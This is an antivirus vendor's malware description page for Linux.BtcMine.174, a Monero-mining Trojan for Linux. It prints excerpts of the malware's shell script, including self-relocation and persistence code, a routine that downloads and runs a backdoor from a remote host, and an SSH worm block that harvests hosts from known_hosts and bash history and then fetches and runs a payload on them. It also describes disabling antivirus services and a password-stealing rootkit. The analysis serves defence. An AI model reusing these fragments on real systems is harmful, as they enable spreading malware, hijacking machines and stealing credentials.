Library
My library

+ Add to library

Profile

Linux.BtcMine.174

Added to the Dr.Web virus database: 2018-11-14

Virus description added:

Linux.BtcMine.174

  • 9ae9233c79390495e607059870671c9936c413c5
  • b59fc07afc9f159562f71b3a21c38b1d471acc2f

A multicomponent malware program capable of infecting Linux devices and intended to be used for Monero (XMR) mining. It is implemented as a shell script containing over 1,000 lines of code.

When launched, it checks whether the server, from which the Trojan will subsequently download additional modules, is available:

function GetDownloadPath()
{
    paths=("/usr/bin" "/bin" "/lib" "/boot" "/tmp" "/home/`whoami`" "`pwd`")
    for path in ${paths[@]}
    do
        if [ -x $path ] && [ -r $path ] && [ -w $path ]
        then
            DownloadPath=$path
            break
        fi
    done
}

If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package).
WatchDogName="diskmanagerd"
arg=$1
#...
function Nohup()
{
    if [ "$arg" != "/sbin/init" ]
    then
        rm -f $DownloadPath$WatchDogName >/dev/null 2>&1
        cp -rf $0 $DownloadPath$WatchDogName
        chmod 755 $DownloadPath$WatchDogName >/dev/null 2>&1
        rm -f $0
        nohup --help >/dev/null 2>&1
        if [ $? -eq 0 ]
        then
            nohup $DownloadPath$WatchDogName "/sbin/init"> $DownloadPath.templog 2>&1 &
            exit
        else
            if [ `id -u` -eq "0" ]
            then
                yum install coreutils -y  >/dev/null 2>&1
                apt-get install coreutils -y  >/dev/null 2>&1
                sleep 30
            fi
            (exec $DownloadPath$WatchDogName "/sbin/init" &> /dev/null &)
            exit
        fi
    fi
}

Then the Trojan downloads and runs a version of the Linux.BackDoor.Gates.9 Trojan. This family of backdoors allows commands issued by cybercriminals to be executed and DDoS attacks to be carried out:

function oh_cause_she_is_dead()
{
    md5sum --help >/dev/null 2>&1
    if [ "$?" = "0" ]
    then
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "md5" "$mdfive_root" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "md5" "$mdfive_user" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    else
        if [ `id -u` -eq "0" ]
        then
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/syn" "$DownloadPath$DownloadFileName"
        else
            DownloadFile "size" "$DownloadFileSize" "http://$remote_host/udp" "$DownloadPath$DownloadFileName"
        fi
    fi
    chmod 755 "$DownloadPath$DownloadFileName"
    $DownloadPath$DownloadFileName
}

After that, the malware program searches for other miners and removes them when it detects them. For this, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.).

If Linux.BtcMine.174 was not launched as root, it downloads and runs another shell script (SHA1: 9ae9233c79390495e607059870671c9936c413c5) from the attackers’ server, which, in turn, downloads and runs a number of exploits to escalate the privileges of Linux.Exploit.CVE-2016-5195 (DirtyCow) and Linux.Exploit.CVE-2013-2094 in the system.

In the next step, the script checks to see whether it is running as root. If it is, it stops services, removes their files using package managers, and empties the directories. The names of the following services are listed in the script: safedog, aegis, yunsuo, clamd, avast, avgd, cmdavd, cmdmgd, drweb-configd, drweb-spider-kmod, esets, xmirrord.

Then the Trojan adds itself to the Autorun list, using /etc/rc.local, /etc/rc.d/..., /etc/cron.hourly. After that, it downloads and launches a rootkit, also executed as a shell script. Among the rootkit module’s notable features is the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

After that, the Trojan runs a feature that collects data from various sources about all the hosts to which the current user has previously connected via SSH. The Trojan tries to connect to these hosts and infect them:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
do
    (
        exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\",@file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1| f1.read})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &
    )
done

Next, the Trojan launches and maintains a Monero (XMR) miner. In an infinite loop, the script checks for updates on a remote server so that it can download and install them if they become available. To do that, it carries out the following actions:

  1. The current script version number is stored to the $shell_ver variable.
  2. The file http://${remote_host}:${remote_port}/shell_ver.txt is downloaded.
  3. The obtained version is checked against the current one. If they match, nothing happens; if they do not match, the Trojan downloads the new script version from the management server.

News about the Trojan

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number